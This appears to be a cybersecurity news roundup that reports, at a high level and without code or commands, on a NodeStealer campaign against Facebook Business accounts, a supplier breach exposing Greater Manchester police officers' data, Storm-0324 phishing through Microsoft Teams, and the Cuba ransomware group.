A persistent cyber campaign has set its sights on Facebook Business accounts, using deceptive messages to harvest user credentials. This campaign employs a variant of NodeStealer, a Python-based malware with a history of compromising Facebook, Gmail, and Outlook accounts.
Netskope Threat Labs researcher Jan Michael Alcantara sheds light on this ongoing threat. The attacks primarily affect Southern Europe and North America, with the manufacturing services and technology sectors being the most prominent targets.
NodeStealer originally emerged as a JavaScript malware known for stealing cookies and passwords from web browsers. However, the latest iteration of this malware is Python-based, with select versions also geared toward cryptocurrency theft. These findings from Netskope suggest that Vietnamese threat actors are likely behind this campaign and have adopted tactics from other adversaries with similar objectives.
Guardio Labs recently uncovered a scheme where fraudulent messages via Facebook Messenger deliver ZIP or RAR archive files containing the NodeStealer malware. These archives appear to contain images of defective products, tricking Facebook business page owners or admins into downloading the malicious payload.
Once executed, the payload opens the Chrome web browser and covertly initiates a PowerShell command to retrieve additional malicious components, including the Python interpreter and NodeStealer malware. Beyond stealing credentials and cookies from various web browsers, this malware also gathers system metadata and exfiltrates the information over Telegram.
Alcantara points out that this new NodeStealer variant is more sophisticated, using batch files to download and execute Python scripts, expanding its reach to multiple browsers and websites. This campaign could potentially serve as a stepping stone for more targeted attacks in the future. Attackers armed with stolen Facebook credentials can misuse them to take over accounts and conduct fraudulent transactions using legitimate business pages.
The Greater Manchester police force has recently become the target of a well-established cyberattack method known as ransomware. On Thursday, it was disclosed that a breach had occurred through a third-party supplier who held information related to the police force's employees.
This breach exposed sensitive information, including details from officers' name badges, such as their ranks, photographs, and serial numbers. The incident is reminiscent of a similar attack on the Metropolitan police, which was announced in August, where data belonging to officers and staff was compromised through the same supplier.
Unfortunately, the Greater Manchester police force is not the only entity affected by ransomware attacks in the UK this year. Other organizations, both public and private, have fallen victim to such attacks, including the Royal Mail, outsourcing firm Capita, and the Barts Health NHS trust. Even The Guardian experienced a ransomware attack last year.
Microsoft has issued a warning regarding a recently identified phishing campaign aimed at infiltrating corporate networks by exploiting Microsoft Teams messages as bait. This campaign is being tracked by Microsoft's Threat Intelligence team under the name Storm-0324, also known as TA543 and Sagrid.
Starting in July 2023, Storm-0324 was observed distributing malicious payloads by employing an open-source tool to send phishing lures through Microsoft Teams chats. This marks a departure from the traditional email-based methods used for initial access in cyberattacks.
Storm-0324 operates as a payload distributor within the cybercriminal landscape, facilitating the spread of various malicious payloads. These payloads include downloaders, banking trojans, ransomware, and modular toolkits like Nymaim, Gozi, TrickBot, IcedID, Gootkit, Dridex, Sage, GandCrab, and JSSLoader.
Past attack sequences orchestrated by this actor have used decoy email messages related to invoices and payments to trick users into downloading ZIP archive files hosted on SharePoint. These files were designed to distribute JSSLoader, a malware loader capable of profiling infected machines and loading additional malicious components.
The actor behind Storm-0324 employs highly evasive email chains, utilizing traffic distribution systems (TDS) like BlackTDS and Keitaro. These systems enable the attackers to identify and filter user traffic, evading detection by certain IP ranges, such as malware sandboxes, while successfully redirecting victims to malicious download sites.
The malware introduced through these attacks ultimately allows the ransomware-as-a-service (RaaS) actor Sangria Tempest (also known as Carbon Spider, ELBRUS, and FIN7) to carry out post-exploitation actions and deploy file-encrypting malware.
As of July 2023, the phishing lures are distributed via Microsoft Teams messages containing malicious links leading to ZIP files hosted on SharePoint. This is achieved by exploiting an issue first highlighted in June 2023, using an open-source tool called TeamsPhisher.
It's important to note that a similar technique was previously used by the Russian nation-state actor APT29 (also known as Midnight Blizzard) in attacks on approximately 40 organizations worldwide in May 2023.
Microsoft has taken several security measures to counter this threat, including suspending accounts and tenants associated with fraudulent activity. Detecting and addressing Storm-0324 activity can prevent more severe follow-on attacks, such as ransomware incidents.
This disclosure comes as Kaspersky provides insights into the tactics, techniques, and procedures of the ransomware group known as Cuba (also known as COLDDRAW and Tropical Scorpius). This group employs the double extortion model and has recently been associated with an alias called "V Is Vendetta." The group utilizes various tools and techniques, including the exploitation of vulnerabilities like ProxyLogon, ProxyShell, ZeroLogon, and Veeam Backup & Replication software flaws.
Ransomware attacks have surged in 2023, with the U.K. National Cyber Security Centre (NCSC) and National Crime Agency (NCA) highlighting that many are reliant on a complex supply chain. They emphasize the importance of cyber hygiene in preventing these opportunistic attacks.
*Subscribe to our newsletter
.svg)
.png)
.png)
